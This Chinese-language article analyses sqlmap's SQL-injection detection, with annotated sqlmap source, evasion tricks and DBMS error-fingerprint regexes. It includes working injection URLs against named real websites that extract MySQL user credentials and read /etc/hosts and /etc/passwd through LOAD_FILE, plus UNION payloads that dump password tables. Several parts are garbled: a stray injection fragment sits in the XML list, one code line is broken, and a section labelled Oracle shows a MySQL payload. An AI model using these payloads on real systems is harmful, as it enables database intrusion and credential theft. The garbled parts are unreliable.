sqlmap 中的 SQL Injection 检测技术

https://github.com/henices/sqli
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

基于信道的 sql injection 分类

Inband

SQL代码注入和SQL injection 结果的获取在同一频道(e.g. 浏览器), 获得的数据直接显示在应用程序页面的正常输出或者错误信息中,这是最简单的攻击类型。

Out-of-band

SQL查询数据的传输使用不同的频道(e.g HTTP,DNS), 这是从数据库中获取大量数据简单的方法。

Inferential

没用真实有用的数据传输,但是攻击者可以通过发送特定的请求,观察数据库服务器的返回的结果的行为重建信息。

基于 sql inject 检测技术的分类

boolean-based blind SQL injection

也被称为推理SQL注入:SqlMap替换或追加HTTP请求中受影响的参数,一个有效的SQL语句字符串包含 SELECT 子语句,或任何其他用户要检索输出的SQL语句。对于每个HTTP响应,将其 headers/body和原始请求的做比较,该工具一个字符一个字符地分析的注入语句的输出。另外,用户可以提供一个字符串或正则表达式匹配正确的页面。使用SqlMap实现的二分算法来实施执行此技术可以获取七个最大的每个HTTP请求的输出的每一个字符。凡不属于输出纯文本纯字符集,SqlMap将适应与更大范围的算法来检测输出。

error-based SQL injection

sqlmap替换或者追加受影响的HTTP参数一个特定数据的语法错误的SQL语句,分析HTTP 响应header和body,查询DBMS错误信息中是否包含注入的预先定义的字符串链,并且SQL语句的输出在字符串链的中间.这种技术仅在web应用程序被配置成泄漏后端数据库管理系统错误信息时有效。

time-based blind or stacked queries

也被称为全盲SQL注入:SqlMap替换或追加HTTP请求中受影响的参数,构造一个有效的SQL语句字符串包含一个查询,使后端DBMS sleep几秒钟。对于每个HTTP响应,比较其响应时间与原始请求的HTTP响应时间,该工具一个字符一个字符地分析的注入语句的输出。和boolean-based技术一样,同样应用了二分算法(bisection algorithm)。

UNION query SQL injection

SqlMap 追加受影响的参数一个以UNION ALL SELECT开始的有效的SQL语句字符串。这种技术当Web应用程序页面内将SELECT语句的同一周期输出,或者类似的,网页上的内容中显示查询结果的每一行时有效。SqlMap是还可以利用部分UNION 查询的SQL注入漏洞,当SQL语句的输出不是在一个周期内的,在构造的区域内只有在查询输出的第一项被显示。

Stacked queries SQL injection

也被称为多语句SQL注入(multiple statements SQL injection):SqlMap 测试 Web 应用程序是否支持批量叠查询, 然后,它支持的情况下,它附加到HTTP请求中受影响的参数,一个分号(;) 随后的SQL语句会被执行。这种技术在执行 SELECT以外的SQL语句时非常有用,根据后端数据库管理系统的不同用户和会话特权,数据定义和数据操作SQL语句可能导致文件系统的读写访问和操作系统命令执行的。

SQL Injection 检测的逃逸技术

随机大小写

INSERT => InsERt

支持的数据库类型:

数据库 是否支持
MSSQL 支持
MySQL 支持
PostgreSQL 支持
Oracle 支持

空格用注释替换

SELECT id FROM users => SELECT/**/id/**/FROM/**/users

支持的数据库类型:

数据库 是否支持
MSSQL 支持
MySQL 支持
PostgreSQL 支持
Oracle 支持
Access 不支持

Oracle 10g 测试

SQL> select/**/*/**/from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE	10.1.0.3.0	Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production

PostgreSQL:

postgres=# select/*abc*/version();
                                                               version                                                                
--------------------------------------------------------------------------------------------------------------------
 PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)

随机注释

INSERT => IN/**/S/**/ERT

本身语法不支持,但可以对付不正确的过滤.

postgres=# selec/**/t version();

ERROR: syntax error at or near “selec” 在字符 1
第 1 行: selec/**/t version();

Oracle:

SQL> sel/**/ect v$version;

SP2-0734: unknown command beginning “sel/**/ect…” - rest of line ignored.

空格用+替换

SELECT id FROM users => SELECT+id+FROM+users

随机空格替换

SELECT id FROM users => SELECT\rid\tFROM\nusers
数据库 是否支持
MSSQL 支持
Mysql 支持
PostgreSQL 支持
Oracle 支持
$echo -e "select\t*from\tv\$version;"| sqlplus "/ as sysdba"

SQL> 
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE	10.1.0.3.0	Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production
echo -e "select\tversion();" | psql -U postgres
                                                               version                                                                
--------------------------------------------------------------------------------------------------------------------------------------
 PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)

urlencode

SELECT FIELD FROM%20TABLE' => '%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45'

between 替换

A > B' => 'A NOT BETWEEN 0 AND B

逃避正则表达式检测

or 1=1  使用  or 'a'='a'

DBMS分析技术

通过错误信息分析DBMS

<?xml version="1.0" encoding="UTF-8"?>

<root>
    <!-- MySQL -->
    <dbms value="MySQL">
        <error regexp="SQL syntax.*MySQL"/>
        <error regexp="Warning.*mysql_.*"/>
        <error regexp="valid MySQL result"/>
        <error regexp="MySqlClient\."/>
    </dbms>

    <!-- PostgreSQL -->
    <dbms value="PostgreSQL">
        <error regexp="PostgreSQL.*ERROR"/>
        <error regexp="Warning.*\Wpg_.*"/>
        <error regexp="valid PostgreSQL result"/>
        <error regexp="Npgsql\."/>
    </dbms>

    <!-- Microsoft SQL Server -->
    <dbms value="Microsoft SQL Server">
        <error regexp="Driver.* SQL[\-\_\ ]*Server"/>
        <error regexp="OLE DB.* SQL Server"/>
        <error regexp="(\W|\A)SQL Server.*Driver"/>
        <error regexp="Warning.*mssql_.*"/>
        <error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
        <error regexp="Exception Details:.*\WSystem\.Data\.SqlClient\."/>
        <error regexp="Exception Details:.*\WRoadhouse\.Cms\."/>
    </dbms>

    <!-- Microsoft Access -->
    <dbms value="Microsoft Access">
        <error regexp="Microsoft Access Driver"/>
        <error regexp="JET Database Engine"/>
        <error regexp="Access Database Engine"/>
    </dbms>

    <!-- Oracle -->
    <dbms value="Oracle">
        <error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
        <error regexp="Oracle error"/>
        <error regexp="Oracle.*Driver"/>
        <error regexp="Warning.*\Woci_.*"/>
        <error regexp="Warning.*\Wora_.*"/>
    </dbms>

    <!-- DB2 -->
    <dbms value="DB2">
        <error regexp="CLI Driver.*DB2"/>
        <error regexp="DB2 SQL error"/>
    </dbms>

    <!-- Informix -->
    <dbms value="Informix">
        <error regexp="Exception.*Informix"/>
    </dbms>

    <!-- Interbase/Firebird -->
    <dbms value="Firebird">
        <error regexp="Dynamic SQL Error"/>
        <error regexp="Warning.*ibase_.*"/>
    </dbms>

    <!-- SQLite -->
    <dbms value="SQLite">AND '[RANDSTR]'='[RANDSTR]
        <error regexp="SQLite/JDBCDriver"/>
        <error regexp="SQLite.Exception"/>
        <error regexp="System.Data.SQLite.SQLiteException"/>
        <error regexp="Warning.*sqlite_.*"/>
        <error regexp="Warning.*SQLite3::"/>
    </dbms>

    <!-- SAP MaxDB -->
    <dbms value="SAP MaxDB">
        <error regexp="SQL error.*POS([0-9]+).*"/>
        <error regexp="Warning.*maxdb.*"/>
    </dbms>

    <!-- Sybase -->
    <dbms value="Sybase">
        <error regexp="Warning.*sybase.*"/>
        <error regexp="Sybase message"/>
        <error regexp="Sybase.*Server message.*"/>
    </dbms>

    <!-- Ingres -->
    <dbms value="Ingres">
        <error regexp="Warning.*ingres_"/>
        <error regexp="Ingres SQLSTATE"/>
        <error regexp="Ingres\W.*Driver"/>
    </dbms>

</root>

更详细地需要DBMS fingerprint 识别技术

检测SQL Injection 的报文

  1. 检查参数是否动态
def checkDynParam(place, parameter, value):
    """
    This function checks if the url parameter is dynamic. If it is
    dynamic, the content of the page differs, otherwise the
    dynamicity might depend on another parameter.
    """

    kb.matchRatio = None

    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
    logger.info(infoMsg)

    # 生成一个随机字符串
    randInt = randomInt()
    payload = agent.payload(place, parameter, value, getUnicode(randInt))
    logger.debug("checkDynParam: %s", payload)
    dynResult = Request.queryPage(payload, place, raise404=False)

    # 如果和原先页面一样,不是动态参数
    if True == dynResult:
        return False

    infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
    logger.info(infoMsg)
    # 再次检查,确认
    randInt = randomInt()
    payload = agent.payload(place, parameter, value, getUnicode(randInt))
    dynResult = Request.queryPage(payload, place, raise404=False)

    return not dynResult
  1. 启发式检测,长度为10的 “,’, ), ( 随机字符串, 使用python RandomStr, 如果发生已知错误,报可能存在sql injection, 可能的数据库

  2. 基于risk 和 level的级别,使用payloads.xml中的报文进行检测

  3. 判断url连接是否稳定,连续连接url两次,如果返回内容完全相同,则认为url稳定。

  4. NullConnection http://www.wisec.it/sectou.php?id=472f952d79293

怎么判断injected payload 成功

comparison 算法, boolean-based blind SQL injections

使用 difflib.SequenceMatcher, 基于页面相似度如果请求发生错误,所有不正确的请求都认为正确。

def comparison(page, getRatioValue=False, pageLength=None):
    if page is None and pageLength is None:
        return None

    regExpResults = None

    seqMatcher = getCurrentThreadData().seqMatcher
    #logger.debug(kb.pageTemplate)
    seqMatcher.set_seq1(kb.pageTemplate)

    if page:
        # String to match in page when the query is valid
        #a.1 如果出现指定字符串,返回True
        if conf.string:
            condition = conf.string in page
            return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

        # Regular expression to match in page when the query is valid
        # a.2 如果出现指定正则表达式,返回Ture
        if conf.regexp:
            condition = re.search(conf.regexp, page, re.I | re.M) is not None
            return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

        # In case of an DBMS error page return None
        if kb.errorIsNone and (wasLastRequestDBMSError() or wasLastRequestHTTPError()):
            return None

        # Dynamic content lines to be excluded before comparison
        # a.4 比较前先将两个页面的动态内容移除
        if not kb.nullConnection:
            page = removeDynamicContent(page)
            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))

        if not pageLength:
            pageLength = len(page)

    # 连接发生错误
    if kb.nullConnection and pageLength:
        if not seqMatcher.a:
            errMsg = "problem occured while retrieving original page content "
            errMsg += "which prevents sqlmap from continuation. please rerun, "
            errMsg += "and if problem persists please turn off optimization switches"
            raise sqlmapNoneDataException, errMsg

        ratio = 1. * pageLength / len(seqMatcher.a)

        if ratio > 1.:
            ratio = 1. / ratio
    else:
        # 正常连接情况, 判断是否使用textOnly命令行参数
        seqMatcher.set_seq1(getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a)
        seqMatcher.set_seq2(getFilteredPageContent(page, True) if conf.textOnly else page)
        # float 3 digits
        ratio = round(seqMatcher.quick_ratio(), 3)
        logger.debug('ratio: %s' % ratio)

    # If the url is stable and we did not set yet the match ratio and the
    # current injected value changes the url page content
    if kb.matchRatio is None:
        if kb.pageStable and ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
            kb.matchRatio = ratio
            logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)

        elif not kb.pageStable:
            # CONSTANT_RATIO = 0.900
            kb.matchRatio = CONSTANT_RATIO
            logger.debug("setting match ratio for current parameter to default value 0.900")

    # If it has been requested to return the ratio and not a comparison
    # response
    if getRatioValue:
        return ratio
    
    # ratio > 0.98, 认为两个页面一样
    elif ratio > UPPER_RATIO_BOUND:  
        return True

    elif kb.matchRatio is None:
        return None

    else:
        # url 不稳定
        if kb.matchRatio == CONSTANT_RATIO:
            return ratio > kb.matchRatio
        else:
            # DIFF_TOLERANCE = 0.05  magic number
            return (ratio - kb.matchRatio) > DIFF_TOLERANCE


移除动态内容
def removeDynamicContent(page):
    """
    Removing dynamic content from supplied page basing removal on
    precalculated dynamic markings
    """

    if page:
        for item in kb.dynamicMarkings:
            prefix, suffix = item

            if prefix is None and suffix is None:
                continue
            elif prefix is None:None
                page = getCompiledRegex('(?s)^.+%s' % suffix).sub(suffix, page)
            elif suffix is None:
                page = getCompiledRegex('(?s)%s.+$' % prefix).sub(prefix, page)
            else:
                page = getCompiledRegex('(?s)%s.+%s' % (prefix, suffix)).sub('%s%s' % (prefix, suffix), page)

    return page

# 查找动态内容
def findDynamicContent(firstPage, secondPage):
    """
    This function checks if the provided pages have dynamic content. If they
    are dynamic, proper markings will be made
    """

    infoMsg = "searching for dynamic content"
    logger.info(infoMsg)

    # 返回匹配的内容
    blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()
    kb.dynamicMarkings = []

    # Removing too small matching blocks
    i = 0
    while i < len(blocks):
        block = blocks[i]
        (_, _, length) = block

	# DYNAMICITY_MARK_LENGTH = 32
        if length <= DYNAMICITY_MARK_LENGTH:
            blocks.remove(block)

        else:
            i += 1

    # Making of dynamic markings based on prefix/suffix principle
    if len(blocks) > 0:

	# 在blocks的前后添加None
        blocks.insert(0, None)
        blocks.append(None)
	
	# 
        for i in xrange(len(blocks) - 1):
            prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
            suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None

            if prefix is None and blocks[i + 1][0] == 0:
                continue

            if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
                continue

	    # 去掉字符串头和尾的字母和数字
            prefix = trimAlphaNum(prefix)
            suffix = trimAlphaNum(suffix)

            kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH/2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH/2]) if suffix else None))

    if len(kb.dynamicMarkings) > 0:
        infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
        logger.info(infoMsg)

grep(正则表达式), error-based SQL injection, 可以检查

MS SQL server, Oracle, Mysql等,使用的语句,使用随机字符串查询,如果返回结果的body,或者头部信息中包含我们构造的随机字符串,则认为存在漏洞.具体数据可以使用sqlmap, payloads.xml,例子:

MySQL >= 5.0 AND error-based - WHERE or HAVING clause

http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136%20AND%20(SELECT%209066%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION()%20AS%20CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)

urldecode 后:

http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 9066 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION() AS CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  • CONCAT 字符串连接
  • IFNULL 判断是否为空
  • CAST 将字符串转化为不同的字符集
  • MID 字符串截取 MID(string, position[, length])
  • CHAR(58,106,108,98,58) => :bjl:
  • CHAR(58,108,112,108,58) => :lpl:

利用的Mysql的一个特性,http://bugs.mysql.com/bug.php?id=32249

Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

这部分没有记录。

PostgreSQL AND error-based - WHERE or HAVING clause

这部分没有记录。

Oracle AND error-based - WHERE or HAVING clause (XMLType)

http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 6531 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,121,98,58),(SELECT MID(IFNULL(CAST(concat(user,char(58),password) AS CHAR), CHAR(32)),1,50) FROM mysql.user LIMIT 0,1),CHAR(58,106,116,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

unionTest() 函数,UNION query (inband) SQL injection

(1) 设置union 使用的字符和注释
(2) 判断union查询的列数

def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None, limited=False):
    """
    Take in input an query (pseudo query) string and return its
    processed UNION ALL SELECT query.

    Examples:

    MySQL input:  CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
    MySQL output:  UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488

    PostgreSQL input:  (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow
    PostgreSQL output:  UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713

    Oracle input:  (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))
    Oracle output:  UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738

    Microsoft SQL Server input:  (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins
    Microsoft SQL Server output:  UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254

    @param query: it is a processed query string unescaped to be
    forged within an UNION ALL SELECT statement
    @type query: C{str}

    @param position: it is the NULL position where it is possible
    to inject the query
    @type position: C{int}

    @return: UNION ALL SELECT query string forged
    @rtype: C{str}
    """

    if query.startswith("SELECT "):
        query = query[len("SELECT "):]

    inbandQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)

    if limited:
        inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, xrange(0, count)))
        inbandQuery += FROM_TABLE.get(Backend.getIdentifiedDbms(), "")
        inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)

        return inbandQuery

    topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
    if topNumRegex:
        topNum = topNumRegex.group(1)
        query = query[len("TOP %s " % topNum):]
        inbandQuery += "TOP %s " % topNum

    intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)

    if intoRegExp:
        intoRegExp = intoRegExp.group(1)
        query = query[:query.index(intoRegExp)]

    if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
        inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]

    for element in xrange(0, count):
        if element > 0:
            inbandQuery += ", "

        if element == position:
            if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
                conditionIndex = query.index(" FROM ")
                inbandQuery += query[:conditionIndex]
            else:
                inbandQuery += query
        else:
            inbandQuery += char

    if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
        conditionIndex = query.index(" FROM ")
        inbandQuery += query[conditionIndex:]

    if Backend.getIdentifiedDbms() in FROM_TABLE:
        if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery:
            inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]

    if intoRegExp:
        inbandQuery += intoRegExp

    if multipleUnions:
        inbandQuery += " UNION ALL SELECT "

        for element in xrange(count):
            if element > 0:
                inbandQuery += ", "

            if element == position:
                inbandQuery += multipleUnions
            else:
                inbandQuery += char

        if Backend.getIdentifiedDbms() in FROM_TABLE:
            inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]

    inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)

    return inbandQuery


def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
    """
    Finds number of columns affected by UNION based injection
    """
    retVal = None

    pushValue(kb.errorIsNone)
    items, ratios = [], []
    kb.errorIsNone = False
    lowerCount, upperCount = conf.uColsStart, conf.uColsStop

    if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: # MIN_UNION_RESPONSES = 5
        upperCount = lowerCount + MIN_UNION_RESPONSES

    min_, max_ = MAX_RATIO, MIN_RATIO # MAX_RATIO = 1.0, MIN_RATIO = 0.0

    for count in range(lowerCount, upperCount+1):
        query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
        page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
        ratio = comparison(page, True) or MIN_RATIO
        ratios.append(ratio)
        min_, max_ = min(min_, ratio), max(max_, ratio)
        items.append((count, ratio))

    ratios.pop(ratios.index(min_)) # pop the min
    ratios.pop(ratios.index(max_)) # pop the max
 
    deviation = stdev(ratios) # 计算标准偏差

    if abs(max_ - min_) < MIN_STATISTICAL_RANGE: # MIN_STATISTICAL_RANGE = 0.01
        return None

    # UNION_STDEV_COEFF = 7
    lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
    minItem, maxItem = None, None

    for item in items:
        if item[1] == min_:
            minItem = item
        elif item[1] == max_:
            maxItem = item

    if min_ < lower:
        retVal = minItem[0]

    if max_ > upper:
        if retVal is None or abs(max_ - upper) > abs(min_ - lower):
            retVal = maxItem[0]

    kb.errorIsNone = popValue()

    if retVal:
        infoMsg = "target url appears to be UNION injectable with %d columns" % retVal
        logger.info(infoMsg)

    return retVal

(3) 根据不同的数据库加上必要的from 表名
(4) 再次验证

def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
    validPayload = None
    vector = None

    positions = range(0, count)

    # Unbiased approach for searching appropriate usable column
    # list 中元素乱序
    random.shuffle(positions)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    # 查找可以显示的列
    for position in positions:
        # Prepare expression with delimiters
        randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) #UNION_MIN_RESPONSE_CHARS = 10
        # 构造随机字符串做标记
        phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop) 
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        import logging
        logging.debug('randQueryProcessed: %s' % randQueryProcessed)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        # 构造UNION ALL SELECT 查询
        query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

        # Perform the request
        page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
        # 移除反射的内容
        content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
            removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
            payload, True) or "")

        if content and phrase in content:
            validPayload = payload
            vector = (position, count, comment, prefix, suffix, conf.uChar, where)

            if where == PAYLOAD.WHERE.ORIGINAL:
                # Prepare expression with delimiters
                randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) # UNION_MIN_RESPONSE_CHARS = 10
                phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)

                # Confirm that it is a full inband SQL injection
                query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
                payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)

                # Perform the request
                page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
                content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")

                if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):
                    vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)

            break

    return validPayload, vector
http://ipv6.tsinghua.edu.cn/end.php?ID=-3255%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,107,113,117,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,104,111,115,116,115%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,101,114,112,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#
http://ipv6.tsinghua.edu.cn/end.php?ID=-8675%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,108,100,107,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,112,97,115,115,119,100%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,111,121,105,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#

基于响应时间, time-based blind and stacked queries SQL injections

判断是否delay,在 lib/core/common.py 中wasLastRequestDelayed 实现根据统计结果,sqlmap 注释

def wasLastRequestDelayed():
    """
    Returns True if the last web request resulted in a time-delay
    """

    # 99.9999999997440% of all non time-based sql injection affected
    # response times should be inside +-7*stdev([normal response times])
    # Math reference: http://www.answers.com/topic/standard-deviation
    deviation = stdev(kb.responseTimes) # 计算所有响应时间的标准偏差
    threadData = getCurrentThreadData()

    if deviation:
        # 需要一定数据量,统计结果才有意义
        # MIN_TIME_RESPONSES = 10
        if len(kb.responseTimes) < MIN_TIME_RESPONSES: 
            warnMsg = "time-based standard deviation method used on a model "
            warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
            logger.warn(warnMsg)

        # TIME_STDEV_COEFF = 10 必须大于等于7
        lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation
        retVal = (threadData.lastQueryDuration >= lowerStdLimit)

        # 如果retVal 为True, 发生Delay,需要调整
        # TIME_DEFAULT_DELAY = 5, kb.testMode sql injection test mode,
        # 用户没用手动更改Delay 时间
        if not kb.testMode and retVal and conf.timeSec == TIME_DEFAULT_DELAY:
            adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)

        return retVal
    else:
        return (threadData.lastQueryDuration - conf.timeSec) >= 0


# length of queue for candidates for time delay adjustment
TIME_DELAY_CANDIDATES = 3
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
kb.delayCandidates = [0, 0, 0]


def adjustTimeDelay(lastQueryDuration, lowerStdLimit):
    """
    Adjusts time delay in time-based data retrieval
    """

    candidate = 1 + int(round((1 - (lastQueryDuration - lowerStdLimit) / lastQueryDuration) * conf.timeSec))

    if candidate:
        kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]

        if all([x == candidate for x in kb.delayCandidates]) and candidate < conf.timeSec:
            print

            warnMsg = "adjusting time delay to %d second%s " % (candidate, 's' if candidate > 1 else '')
            warnMsg += "(due to good response times)"
            logger.warn(warnMsg)

            conf.timeSec = candidate

